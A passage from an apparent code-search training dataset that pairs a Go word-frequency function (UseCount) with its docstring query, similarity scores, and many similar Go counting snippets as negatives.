apihelper_pkg.NewAPIError(\"HTTP Response Not OK\", _response.Code, _response.RawBody)\r\n }\r\n if(err != nil) {\r\n //error detected in status code validation\r\n return nil, err\r\n }\r\n\r\n //returning the response\r\n var retVal *models_pkg.ChargesDueDateResponse = &models_pkg.ChargesDueDateResponse{}\r\n err = json.Unmarshal(_response.RawBody, &retVal)\r\n\r\n if err != nil {\r\n //error in parsing\r\n return nil, err\r\n }\r\n return retVal, nil\r\n\r\n}", "func postRequest(url string, data interface{}) (string, error) {\n\tjsonStr, err := json.Marshal(data)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treq, err := http.NewRequest(http.MethodPost, url, bytes.NewReader(jsonStr))\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\tresp, err := makeRequest(req)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif resp == nil {\n\t\treturn \"\", ErrResponseNil\n\t}\n\tdefer resp.Body.Close()\n\n\tbodyBytes, err := getBody(resp)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif resp.StatusCode != http.StatusOK {\n\t\treturn \"\", types.NewErrServiceClient(resp.StatusCode, bodyBytes)\n\t}\n\n\tbodyString := string(bodyBytes)\n\treturn bodyString, nil\n}" ]
[ "0.5914197", "0.55181926", "0.5435871", "0.54320824", "0.53961176", "0.5329949", "0.5314411", "0.53118277", "0.5251044", "0.52255505", "0.5202661", "0.51785505", "0.5164699", "0.5156227", "0.5141937", "0.51379454", "0.5116525", "0.5100007", "0.50875044", "0.5071844", "0.5071636", "0.50537944", "0.5045024", "0.50320244", "0.50271857", "0.5015173", "0.4992869", "0.4983716", "0.49830192", "0.49542356", "0.49529797", "0.49495548", "0.49490687", "0.49479374", "0.49400294", "0.4931829", "0.4920203", "0.4916152", "0.49097437", "0.49035504", "0.48952624", "0.48914933", "0.48896563", "0.48894063", "0.48884007", "0.48865083", "0.48857236", "0.48834765", "0.4881683", "0.48591268", "0.4858131", "0.4855462", "0.48529142", "0.48422396", "0.48386604", "0.4835642", "0.4833152", "0.48304275", "0.4826355", "0.4824881", "0.4823973", "0.48231143", "0.48214516", "0.4819272", "0.48072222", "0.47983223", "0.47978458", "0.4792064", "0.4791343", "0.4791329", "0.47900325", "0.47863206", "0.4785883", "0.47816023", "0.4777563", "0.47770473", "0.47766304", "0.47731283", "0.4771215", "0.47704145", "0.47672096", "0.47671917", "0.4766216", "0.47617304", "0.47542655", "0.47528133", "0.4751013", "0.4750761", "0.4750426", "0.47494847", "0.47471926", "0.4741548", "0.47414154", "0.47348607", "0.47347903", "0.4734623", "0.47332323", "0.47317514", "0.47311148", "0.47302994" ]
0.565141
1
UseCount gets a string with words and returns the frequency of each word
func UseCount(s string) map[string]int { xs := strings.Fields(s) m := make(map[string]int) for _, v := range xs { m[v]++ } return m }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func WordCount(s string) Frequency {\n\twords := wordRegex.FindAllString(s, -1)\n\tresult := make(Frequency)\n\tfor _, word := range words {\n\t\tresult[strings.ToLower(word)]++\n\t}\n\treturn result\n}", "func WordCount(phrase string) Frequency {\n\tvar f Frequency = make(Frequency)\n\tphrase = strings.ToLower(phrase)\n\n\tre := regexp.MustCompile(\"[a-z0-9]+('[a-z0-9]+|[a-z0-9]*)\")\n\twords := re.FindAllString(phrase, -1)\n\n\tfor _, v := range words {\n\t\tif len(v) > 0 {\n\t\t\tf[v]++\n\t\t}\n\n\t}\n\treturn f\n}", "func WordCount(s string) map[string]int {\n\tfreq := make(map[string]int)\n\tfor _, word := range strings.Fields(s) {\n\t\tfreq[word] += 1\n\t}\n\treturn freq\n}", "func WordCount(phrase string) Frequency {\n\n\tfreqs := make(Frequency)\n\t//a word is an extent of alphabetic characters\n\tre := regexp.MustCompile(\"[[:alnum:]]+\")\n\t//for each word we find ...\n\tfor _, word := range re.FindAllString(phrase, -1) {\n\t\t//increment the frequency of the word (words are all lowercased)\n\t\tfreqs[strings.ToLower(word)]++\n\t}\n\treturn freqs\n}", "func countFreq(s string) map[rune]int {\n\tfreqMap := make(map[rune]int)\n\tfor _, c := range s {\n\t\tfreqMap[c] += 1\n\t}\n\treturn freqMap\n}", "func WordCount(input string) (result Frequency) {\n\tresult = make(Frequency)\n\trinput := []rune(strings.ToLower(input))\n\n\tstop, start := 0, 0\n\tfor nstop, r := range rinput {\n\t\tstop = nstop\n\t\tif isWhitemark(r) {\n\t\t\tfor ; start < len(rinput) && isWhitemark(rinput[start]); start++ {\n\t\t\t}\n\n\t\t\tif start < stop {\n\t\t\t\tresult[getKey(rinput, start, stop)]++\n\t\t\t\tstart = stop + 1\n\t\t\t}\n\t\t}\n\t}\n\n\tif len(rinput[start:]) > 0 {\n\t\tresult[getLastKey(rinput, start)]++\n\t}\n\n\treturn\n}", "func freqAnalyze(text string) freqDistr {\n\twords := map[string]int{}\n\n\tspaceReplace := func(r rune) rune {\n\t\tswitch r {\n\n\t\tcase '.', ',', '!', '?', ':', ';', '-', '—', '\\r', '\\n', '\\t':\n\t\t\treturn ' '\n\t\t}\n\t\treturn unicode.ToLower(r)\n\t}\n\n\tsplits := strings.Split(strings.Map(spaceReplace, text), \" \")\n\n\tfor _, s := range splits {\n\t\tif s != \"\" {\n\t\t\twords[s]++\n\t\t}\n\t}\n\treturn words\n}", "func Frequency(s string) FreqMap {\n m := FreqMap{}\n for _, r := range s {\n m[r]++\n }\n return m\n}", "func WordCount(s string) map[string]int {\n \n\twords := strings.Fields(s)\n wordCountMap := make(map[string]int)\n \n for _,word := range words{\n wordCountMap[word]++ \n }\n \n return wordCountMap\n}", "func wordCount(s string) map[string]int {\n\tt := re.FindAllStringSubmatch(s, -1)\n\tif t == nil {\n\t\treturn nil\n\t}\n\n\thash := make(map[string]int)\n\tfor i := 0; i < len(t); i++ {\n\t\tword := t[i][1]\n\t\tif _, ok := hash[word]; ok {\n\t\t\thash[word]++\n\t\t} else {\n\t\t\thash[word] = 1\n\t\t}\n\t}\n\n\treturn hash\n}", "func WordCount(s string) map[string]int {\n\tvar words = make(map[string]int)\n\tfor _, v := range strings.Fields(s) {\n\t\tif words[v] == 0 {\n\t\t\twords[v] = 1\n\t\t} else {\n\t\t\twords[v]++\n\t\t}\n\t}\n\treturn words\n}", "func wordCount(str string) int {\n\treturn len(strings.Fields(str))\n}", "func WordCount(s string) map[string]int {\n\tm := map[string]int{}\n\tf := strings.Fields(s)\n\t// fmt.Printf(\"%T %v %v\\n\", f, f, len(f))\n\tfor _, v := range f {\n\t\tm[v]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequency(s string) FreqMap {\n\tm := FreqMap{}\n\tfor _, r := range s {\n\t\tm[r]++\n\t}\n\treturn m\n}", "func Frequencies(word string) map[rune]int {\n\tfrequencies := map[rune]int{}\n\tfor _, char := range word {\n\t\tfrequencies[unicode.ToLower(char)]++\n\t}\n\treturn frequencies\n}", "func WordCount(s string) map[string]int {\n\twordsMap := map[string]int{}\n\twords := strings.Split(s, \" \")\n\tfor _, word := range words {\n\t\tif _, ok := wordsMap[word]; ok {\n\t\t\twordsMap[word]++\n\t\t} else {\n\t\t\twordsMap[word] = 1\n\t\t}\n\t\t// can just do wordsMap[word]++ because then accessing\n\t\t// a nonexistent then the zero value will be 0, but this\n\t\t// way is better for cases where its something that needs\n\t\t// proper initialization.\n\t}\n\treturn wordsMap\n}", "func WordCount(s string) map[string]int {\n\twcount := make(map[string]int)\n\tfor _, v := range strings.Fields(s) {\n\t\twcount[v] = wcount[v] + 1\n\t}\n\treturn wcount\n}", "func wordFreq(filename string, word string)(int, time.Duration){\n\tstartTime := time.Now()\n\tfile, err := os.Open(filename)\n\tif err != nil {\n\t\treturn -1000, time.Since(startTime)\n\t}\n\tdefer file.Close()\n\n\tscanner := bufio.NewScanner(file)\n\twc := 0\n\tfor scanner.Scan() {\n\t\twords := strings.Fields(scanner.Text())\n\t\tfor _, lword := range words {\n\t\t\tif lword == word || lword == word+\",\" || lword == word+\".\"{\n\t\t\t\twc += 1\n\t\t\t}\n\t\t}\n\t}\n\n\tdur := time.Since(startTime)\n\treturn wc, dur\n}", "func countWords(sInput string){\n\twordMap := make(map[string]int)\n\tfmt.Println(wordMap)\n}", "func WordCount(s string) map[string]int {\n\twords := strings.Fields(s)\n\twc := make(map[string]int)\n\tfor i := range words {\n\t\twc[words[i]]++\n\t}\n\treturn wc\n\n}", "func Count(str, operand string) int { return strings.Count(operand, str) }", "func countWords(in <-chan string) {\n\twg.Add(1)\n\tgo func() {\n\t\tdefer wg.Done()\n\t\tresult := make(map[string]int)\n\t\tfor l := range in {\n\t\t\tfor _, pc := range replaceChars {\n\t\t\t\tl = strings.Replace(l, string(pc), \"\", -1)\n\t\t\t}\n\t\t\tl = strings.ToLower(l)\n\t\t\twords := strings.Split(l, \" \")\n\t\t\tfor _, w := range words {\n\t\t\t\tresult[w] = result[w] + 1\n\t\t\t}\n\t\t}\n\t\tresults <- result\n\t}()\n}", "func WordCount(s string) map[string]int {\n\n\tvar m map[string]int\n\n\twords := strings.Fields(s)\n\n\tm = make(map[string]int, len(words))\n\n\tfor _, w := range words {\n\t\t_, ok := m[w]\n\t\tif ok != true {\n\t\t\tm[w] = 1\n\t\t} else {\n\t\t\tm[w]++ // m[w] += 1 should be replaced with m[w]++\n\t\t}\n\t}\n\treturn m\n}", "func Count(subString, fullString string) int {\n\tcount := 0\n\tfor _, s := range utils.AllSubstrings(fullString) {\n\t\tif MatchString(subString, s) { // need to reconstruct the nfa for each substring\n\t\t\tcount++\n\t\t}\n\t}\n\treturn count\n}", "func countWordsInString(sInput string) map[string]int {\n\t//change the input into a rune array\n\tsTemp := []rune(sInput)\n\treturn (countWordsInRunes(sTemp))\n}", "func frequencies(wordList []string) map[string]int {\n\twordFreqs := map[string]int{}\n\tfor _, word := range wordList {\n\t\tif _, present := wordFreqs[word]; present {\n\t\t\twordFreqs[word] += 1\n\t\t} else {\n\t\t\twordFreqs[word] = 1\n\t\t}\n\t}\n\treturn wordFreqs\n}", "func Count(s string) int {\n\t// write the code for this func\n\treturn len(strings.Fields(s))\n}", "func WordsCount() {\n\tvar mutex = &sync.Mutex{}\n\tvar counter = make(map[string]int)\n\tvar inputs = readInputParams()\n\tvar paths = getValidPaths(inputs)\n\n\tresources := make([]interface{}, len(paths))\n\tfor i, path := range paths {\n\t\tresources[i] = path\n\t}\n\tpool := workerpool.NewPool(numWorkers)\n\tpool.Start(resources, count(counter, mutex), resultsCollector)\n\n\tfmt.Println(counter)\n}", "func countWords(str string) int {\n\tword := regexp.MustCompile(\"\\\\S+\")\n\ts := word.FindAllString(str, -1)\n\treturn len(s)\n}", "func WordCount(s string) map[string]int {\n\n\t// Split strings on spaces (e.g. isSpace)\n\twords := strings.Fields(s)\n\tfmt.Println(words)\n\n\twordCounts := make(map[string]int)\n\n\tfor _, word := range words {\n\n\t\t// Words cannot start or end with - or '\n\t\tif !(strings.HasPrefix(word, \"-\") || strings.HasPrefix(word, \"'\") || strings.HasSuffix(word, \"-\") || strings.HasSuffix(word, \"'\")) {\n\n\t\t\t_, ok1 := stopwords[word]\n\n\t\t\tif !ok1 {\n\t\t\t\t_, ok2 := wordCounts[word]\n\n\t\t\t\tif ok2 {\n\t\t\t\t\twordCounts[word] += 1\n\t\t\t\t} else {\n\t\t\t\t\twordCounts[word] = 1\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn wordCounts\n}", "func countWordLenByCounter(str string) []int {\n\tif len(str) == 0 {\n\t\treturn []int{0}\n\t}\n\tstr = strings.Replace(str, \",\", \"\", -1)\n\n\tcount := []int{}\n\tcounter := 0\n\tfor _, s := range str {\n\t\tif (s != ' ') && (s != '.') {\n\t\t\tcounter++\n\t\t\tcontinue\n\t\t}\n\t\tcount = append(count, counter)\n\t\tcounter = 0\n\t}\n\treturn count\n}", "func wordCount(filename string)(int, time.Duration){\n\tstartTime := time.Now()\n\tfile, err := os.Open(filename)\n\tif err != nil {\n\t\treturn -1000, time.Since(startTime)\n\t}\n\tdefer file.Close()\n\n\tscanner := bufio.NewScanner(file)\n\ttotWc := 0\n\tfor scanner.Scan() {\n\t\twords := strings.Fields(scanner.Text())\n\t\ttotWc += len(words)\n\t}\n\tdur := time.Since(startTime)\n\treturn totWc, dur\n}", "func countWordsInRunes(sTemp []rune) map[string]int {\n\t//build a map for kv\n\twordMap := make(map[string]int)\n\n\t//find a word\n\ti, lInput := 0, len(sTemp)\n\tfmt.Printf(\"length of input is %d\\n\", lInput)\n\tstart := time.Now()\n\tfmt.Println(\"Time is \", start)\n\tfor i < lInput {\n\t\t//make a slice for a word\n\t\tsWord := make([]rune, 100)\n\t\tj := 0\n\t\tfor i < lInput && isLegal(sTemp[i]) {\n\t\t\tsWord[j] = sTemp[i]\n\t\t\ti++\n\t\t\tj++\n\t\t}\n\n\t\t//add a kv\n\t\tword := string(sWord[:j])\n\t\tfmt.Println(word)\n\t\tfmt.Printf(\"Start to find the word %s...\\n\", word)\n\n\t\tv, ok := wordMap[word]\n\t\tif ok {\n\t\t\twordMap[word] = v + 1\n\t\t\tfmt.Println(\"found!\")\n\t\t} else {\n\t\t\twordMap[word] = 1\n\t\t\tfmt.Println(\"Not found...\")\n\t\t}\n\t\tfmt.Println(\"Time is \", time.Now())\n\t\t//jump to next word\n\t\ti++\n\t}\n\tfmt.Printf(\"Cost %v\\n\", time.Now().Sub(start))\n\treturn wordMap\n}", "func Count(str string, pattern string) int {\n\treturn xstrings.Count(str, pattern)\n}", "func CountWords(str string) map[string]int {\n\tm := make(map[string]int)\n\tbuffer := bytes.NewBuffer(nil)\n\tfor _, r := range []rune(str) {\n\t\tif unicode.IsSpace(r) {\n\t\t\tif buffer.Len() > 0 {\n\t\t\t\tm[buffer.String()]++\n\t\t\t\tbuffer.Reset()\n\t\t\t}\n\t\t} else {\n\t\t\tbuffer.WriteRune(r)\n\t\t}\n\t}\n\tif buffer.Len() > 0 {\n\t\tm[buffer.String()]++\n\t}\n\treturn m\n}", "func (StringService) Count(s string) int {\n\treturn len(s)\n}", "func CountWords(bytes *[]byte) int {\n\tnumWords := 0\n\tisWord := false\n\n\tfor _, c := range *bytes {\n\t\tr := rune(c)\n\t\tif unicode.IsLetter(r) {\n\t\t\tisWord = true\n\t\t} else if isWord && !unicode.IsLetter(r) {\n\t\t\tnumWords++\n\t\t\tisWord = false\n\t\t}\n\t}\n\n\treturn numWords\n}", "func WordCount(s string) Messages {\n\tstrs := strings.Fields(s)\n\tres := make(map[string]int)\n\n\tfor _, str := range strs {\n\t\tif len(str) > 2 {\n\t\t\tres[strings.ToLower(str)]++\n\t\t}\n\t}\n\n\tmessages := []Msg{}\n\n\tfor k, v := range res {\n\t\tm := Msg{\n\t\t\tText: k,\n\t\t\tCount: v,\n\t\t}\n\t\tmessages = append(messages, m)\n\t}\n\n\treturn messages\n}", "func countRegexFrequency(matcher, text string) int {\n\tregex := regexp.MustCompile(matcher)\n\tmatches := regex.FindAllStringSubmatch(text, -1)\n\n\treturn len(matches)\n}", "func word_count(words []string, m map[string]string, keys *[]string, line_count int) {\n\t//Enter your code here. Read input from STDIN. Print output to STDOUT\n\tfor _, v := range words {\n\t\tif val, ok := m[v]; ok {\n\t\t\tm[v] = val + \" \" + strconv.Itoa(line_count)\n\t\t} else {\n\t\t\tm[v] = strconv.Itoa(line_count)\n\t\t\t*keys = append(*keys, v)\n\t\t}\n\t}\n}", "func Count(s string) int {\n\txs := strings.Fields(s)\n\treturn len(xs)\n}", "func Count(s string) int {\n\txs := strings.Fields(s)\n\treturn len(xs)\n}", "func Count(s, substr string) int {\n\treturn strings.Count(s, substr)\n}", "func countWordLenByAppend(str string) []int {\n\tcount := []int{}\n\tfor _, s := range strings.Split(str, \" \") {\n\t\tcount = append(count, len(s))\n\t}\n\treturn count\n}", "func (cMap *MyStruct) GetCount(word string) int{\n\tcMap.asking <- word\n\tcount := <- cMap.temp\n\tfmt.Println(\"Word Count for \",word, \"is \",count)\n\treturn count\n}", "func Counter(str string) int {\n\tif len(str) == 0 {\n\t\treturn 0\n\t}\n\t\n\tvar count, index, brk int\n\trunes := []rune(str)\n\t\n\tl := len(runes)\n\t\n\tfor {\n\t\tbrk = nextBreak(str, index)\n\t\tif brk < l {\n\t\t\tindex = brk\n\t\t\tcount++\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\t\n\tif index < l {\n\t\tcount++\n\t}\n\treturn count\n}", "func totalWords(t string) int {\n\tfound := false\n\tc := 0\n\n\tfor _, i := range t {\n\t\tcheck := found\n\t\tfound = !unicode.IsSpace(i)\n\t\tif found && !check {\n\t\t\tc++\n\t\t}\n\t}\n\treturn c\n}", "func countDemo(a string, b string) int {\n\treturn strings.Count(a, b)\n}", "func Count(s string) int {\n\treturn utf8.RuneCountInString(s)\n}", "func count(rawdata string, c chan dict) { // mapfn\n\tm := make(dict)\n\twords := strings.Fields(rawdata)\n\n\tfor _, word := range words {\n\t\tm[word]++\n\t}\n\n\tc <- m\n}", "func countWordLen(str string) []int {\n\tss := strings.Split(str, \" \")\n\tcount := make([]int, len(ss))\n\tfor i := 0; i < len(ss); i++ {\n\t\tcount[i] = len(ss[i])\n\t}\n\treturn count\n}", "func CountStems(in []byte) (map[string]int, error) {\n\tcounter := NewCounter()\n\tscanner := bufio.NewScanner(bytes.NewReader(in))\n\tscanner.Split(stemScanWords)\n\n\tfor scanner.Scan() {\n\t\tword := scanner.Bytes()\n\t\tif stem := Stem(word); stem != nil {\n\t\t\tcounter.Add(stem)\n\t\t}\n\t}\n\treturn counter.GetOccurrences(), scanner.Err()\n}", "func bucket(counts map[string]int, text string) {\n\twords := strings.Split(text, \" \")\n\tfor _, v := range words {\n\t\tcounts[v]++\n\t}\n}", "func countWords(fname string) int {\n\t//open file\n\tf, error := os.Open(fname)\n\t//handle error\n\terror_handler(error)\n\t\n\t//store file in buffer\n\tfscan := bufio.NewScanner(f)\n\t\n\t//split file into lines\n\tfscan.Split(bufio.ScanLines)\n\t\n\t//scan line\n\tfscan.Scan()\n\t\n\t//store words in line\n\twords := strings.Fields(fscan.Text())\n\t\n\t//count and return number of words\n\treturn len(words)\n}", "func FrequencyMap(text string, k int) map[string]int {\n freq := make(map[string]int)\n // range over all k-mer substrings of text\n for j :=0; j < len(text)-k+1; j++ {\n pattern := text[j:j+k]\n\n //method 1:\n /*\n // does freq[pattern] exist?\n _, exists := freq[pattern]\n // exists is boolean = false if freq[pattern] doesn't exist\n if !exists {\n freq[pattern] = 1\n } else {\n freq[pattern]++\n }\n */\n\n //method 2: shortcut\n freq[pattern]++\n // if freq[pattern] doesnt exist, Go creates it as default value = 0\n // and then adds 1 to it. If it exists, it adds 1 to it\n }\n\n return freq\n}", "func Count(str, substr string) int {\n\treturn strings.Count(str, substr)\n}", "func Count(numStr string) (total float64) {\n\ts := strings.Split(numStr, \",\")\n\tfor num := range s {\n\t\ttotal += float64(num)\n\t}\n\treturn\n}", "func WordCount(content string) <-chan map[string]int {\n\twc := make(chan map[string]int)\n\tgo func() {\n\t\ts := strings.Fields(content)\n\t\tm := make(map[string]int)\n\t\tfor _, word := range s {\n\t\t\t_, ok := m[word]\n\t\t\tif ok {\n\t\t\t\tm[word]++\n\t\t\t} else {\n\t\t\t\tm[word] = 1\n\t\t\t}\n\t\t}\n\n\t\twc <- m\n\t\tclose(wc)\n\t}()\n\treturn wc\n}", "func TestMoreThanTenFrequencyWords(t *testing.T) {\n\tinputString := \"You may find this word unique because of its unusual spelling. \" +\n\t\t\"YOU MAY FIND THIS WORD UNIQUE BECAUSE OF ITS UNUSUAL SPELLING. \" +\n\t\t\"yOu mAy fInD ThIs wOrD UnIqUe bEcAuSe oF ItS UnUsUaL SpElLiNg\"\n\tfa := NewFrequencyAnalyzer(inputString)\n\n\tactualWords := fa.Search()\n\texpectedWords := []string{\"you\", \"may\", \"find\", \"this\", \"word\", \"unique\", \"because\", \"of\", \"its\", \"unusual\"}\n\tassert.Equal(t, expectedWords, actualWords)\n}", "func exampleFindFreqTerms() {\n\t// Read text from file\n\ttext, err := streeng.StringFromFile(\"pp.txt\")\n\tif err != nil {\n\t\tfmt.Println(\"String from file error:\", err.Error())\n\t\treturn\n\t}\n\n\t// split text with whitespace seperator\n\twords := strings.Fields(text)\n\n\t// Make a new Streeng\n\ts := streeng.MakeStreeng(words)\n\n\t/*\n\t\tEvaluate all terms and tokenize all words.\n\t\tIf you don't run terms before FindFreqTerms,\n\t\tit will return nil\n\t*/\n\ts.Terms()\n\n\t// Find a terms with minimum frequency as string int map\n\tfreq := s.FindFreqTerms(3000)\n\n\tfmt.Println(freq)\n}", "func CountTwo(s string) int {\n\tc := 0\n\tm := UseCount(s)\n\tfor _, v := range m {\n\t\tc += v\n\t}\n\treturn c\n}", "func countStrings(fileName string) map[string]int {\n\n\tvar wordMap map[string]int = make(map[string]int)\n\n\tallBytes, err := ioutil.ReadFile(fileName)\n\n\tif err != nil {\n\t\tpanic(\"Is not able to read a file or file does not exists\")\n\t}\n\n\t// type cast the content we red from file to string\n\tallString := string(allBytes)\n\n\t// Split the big string to small string word by word\n\twords := strings.Split(allString, \" \")\n\n\tfor _, w := range words {\n\n\t\tif w != \" \" || w != \"\\n\" {\n\n\t\t\t_, sk := wordMap[w]\n\n\t\t\tif sk {\n\t\t\t\twordMap[w]++\n\t\t\t} else {\n\t\t\t\twordMap[w] = 1\n\t\t\t}\n\n\t\t}\n\t}\n\n\treturn wordMap\n}", "func (d DNA) Counts() (Histogram, error) {\n\tvalidNucleotides := \"ACGT\"\n\tif d != \"\" && regexp.MustCompile(\"[^\"+validNucleotides+\"]\").MatchString(string(d)) {\n\t\treturn nil, errors.New(\"invalid nucleotides\")\n\t}\n\tvar h Histogram = make(map[rune]int)\n\tfor _, char := range validNucleotides {\n\t\th[char] = strings.Count(string(d), string(char))\n\t}\n\treturn h, nil\n}", "func WordCounts(r io.Reader) (map[string]int, error) {\n\tinstream := NewTokenizer().Tokenize(r)\n\twc := make(map[string]int)\n\tfor token := range instream {\n\t\twc[token] = wc[token] + 1\n\t}\n\treturn wc, nil\n}", "func TestAllWordsUnique(t *testing.T) {\n\tinputString := \"Do you know what this word means?\"\n\tfa := NewFrequencyAnalyzer(inputString)\n\n\tactualWords := fa.Search()\n\texpectedWords := []string{\"do\", \"you\", \"know\", \"what\", \"this\", \"word\", \"means\"}\n\tassert.Equal(t, expectedWords, actualWords)\n}", "func CountWordsPerSentence(sentences []string) map[string]int {\n\tresult := make(map[string]int)\n\tfor _, sentence := range sentences {\n\t\twords := strings.Split(sentence, \" \")\n\t\tif len(words) == 1 && words[0] == \"\" {\n\t\t\tresult[sentence] = 0\n\t\t\tcontinue\n\t\t}\n\t\tresult[sentence] = len(words)\n\t}\n\n\treturn result\n}", "func (word ControlWord) Count() int {\n\treturn int((uint32(word) >> 20) & 0xF)\n}", "func frequencySort(s string) string {\r\n\thT := make(map[string]int)\r\n\tvar res = \"\"\r\n\tfor i, _ := range s {\r\n\t\tss := s[i:i+1]\r\n\t\tif _, ok := hT[ss]; ok {\r\n\t\t\thT[ss] += 1\r\n\t\t} else {\r\n\t\t\thT[ss] = 1\r\n\t\t}\r\n\t}\r\n\tl := len(hT)\r\n\tfor i := 0; i < l; i++ {\r\n\t\tmax, key := ^int(^uint(0) >> 1), \"\"\r\n\t\tfor k, v := range hT {\r\n\t\t\tif max < v {\r\n\t\t\t\tmax, key = v, k\r\n\t\t\t}\r\n\t\t}\r\n\t\tfor j := 0; j < max; j++ {\r\n\t\t\tres += key\r\n\t\t}\r\n\t\tdelete(hT, key)\r\n\t}\r\n\treturn res\r\n}", "func Count(spin string) int {\n\tcount := 1\n\tmatches := re.FindAllString(spin, -1)\n\tfor _, match := range matches {\n\t\tparts := strings.Split(match[1:len(match)-1], \"|\")\n\t\tif len(parts) >= 1 {\n\t\t\tcount *= len(parts)\n\t\t}\n\t}\n\treturn count\n}", "func countCharacters(words []string, chars string) int {\n sum := 0\n m := [26]byte{}\n for _, v := range chars {\n m[v-'a']+=1\n }\n for _, v := range words {\n sum += len(v)\n m2 := [26]byte{}\n for _, j := range v {\n m2[j-'a']+=1\n if m2[j-'a'] > m[j-'a'] {\n sum -= len(v)\n break\n }\n }\n }\n return sum\n}", "func ConcurrentFrequency(strs []string) FreqMap {\n\tch := make(chan FreqMap, 10)\n\tfor _, s := range strs {\n\t\tgo func(str string) {\n\t\t\tch <- Frequency(str)\n\t\t}(s)\n\t}\n\n\ttotalFreq := FreqMap{}\n\tfor range strs {\n\t\tfor k, v := range <-ch {\n\t\t\ttotalFreq[k] += v\n\t\t}\n\t}\n\treturn totalFreq\n}", "func TestSortingByFrequentlyOccurringWords(t *testing.T) {\n\tinputString := \"UnusUaL UNUsUaL UnUsUaL UnUsUaL UnUsUaL UnUsUaL UnUsUaL UNUsUaL UnUsUal UnUsUaL UnUsUal.\" +\n\t\t\"iTs iTs iTs ITS iTs iTs iTs iTs iTs iTS.\" +\n\t\t\"oF Of of Of OF Of oF Of of.\" +\n\t\t\"bEcAuSe bEcAuSe bEcAuSe bEcAuSe bEcAuSe bEcAuSe bEcAuSe bEcAuSe.\" +\n\t\t\"uniQue unIque uniquE Unique uniquE unIQue unIQue.\" +\n\t\t\"Word Word Word Word Word WoRd.\" +\n\t\t\"THIS THIS THIS THIS THIS.\" +\n\t\t\"FinD fIND finD finD.\" +\n\t\t\"MaY mAy MAy.\" +\n\t\t\"You YOu\"\n\tfa := NewFrequencyAnalyzer(inputString)\n\n\tactualWords := fa.Search()\n\texpectedWords := []string{\"unusual\", \"its\", \"of\", \"because\", \"unique\", \"word\", \"this\", \"find\", \"may\", \"you\"}\n\tassert.Equal(t, expectedWords, actualWords)\n}", "func words(s string) int {\n\tb, n := true, 0\n\tfor _, r := range []rune(s) {\n\t\tswitch {\n\t\tcase unicode.IsSpace(r):\n\t\t\tb = true\n\t\tcase b:\n\t\t\tb = false\n\t\t\tn++\n\t\t}\n\t}\n\treturn n\n}", "func (d DNA) Counts() (histogram Histogram, err error) {\n\thistogram = Histogram{'A': 0, 'C': 0, 'G': 0, 'T': 0}\n\n\tfor _, rune := range d {\n\t\tif _, ok := histogram[rune]; !ok {\n\t\t\treturn histogram, errors.New(\"Invalid nucleotide\")\n\t\t}\n\t\thistogram[rune] += 1\n\t}\n\n\treturn histogram, nil\n}", "func Test_Count(t *testing.T) {\n\tparser := NewDefault()\n\tdocument, _, err := parser.Parse(\"count.tf\", []byte(count))\n\trequire.NoError(t, err)\n\trequire.Len(t, document, 1)\n\trequire.Contains(t, document[0], \"resource\")\n\trequire.Contains(t, document[0][\"resource\"].(model.Document)[\"aws_instance\"], \"server1\")\n\trequire.NotContains(t, document[0][\"resource\"].(model.Document)[\"aws_instance\"], \"server\")\n}", "func main() {\n\tcounts := make(map[string]int)\n\tinput := bufio.NewScanner(os.Stdin)\n\tfor input.Scan() {\n\t\tcounts[input.Text()]++\n\t}\n\tfor text, count := range counts {\n\t\tif count > 1 {\n\t\t\tfmt.Printf(\"%s: %d\\n\", text, count)\n\t\t}\n\t}\n}", "func maxFreq(s string, maxLetters int, minSize int, maxSize int) int {\n\tmaxOccurrences := 0\n\toccurrences := make(map[string]int)\n\n\tfor i := 0; i <= len(s)-minSize; i++ {\n\t\tsubStr := s[i : i+minSize]\n\t\tif c, ex := occurrences[subStr]; ex {\n\t\t\tmaxOccurrences = incrementOccurrenceAndGetMax(occurrences, c, maxOccurrences, subStr)\n\t\t} else {\n\t\t\tuniqueChars := countUniqueChars(subStr)\n\t\t\tif uniqueChars <= maxLetters {\n\t\t\t\tc, _ := occurrences[subStr]\n\t\t\t\tmaxOccurrences = incrementOccurrenceAndGetMax(occurrences, c, maxOccurrences, subStr)\n\t\t\t}\n\t\t}\n\t}\n\n\treturn maxOccurrences\n}", "func TestInputStringWithoutWords(t *testing.T) {\n\tinputString := 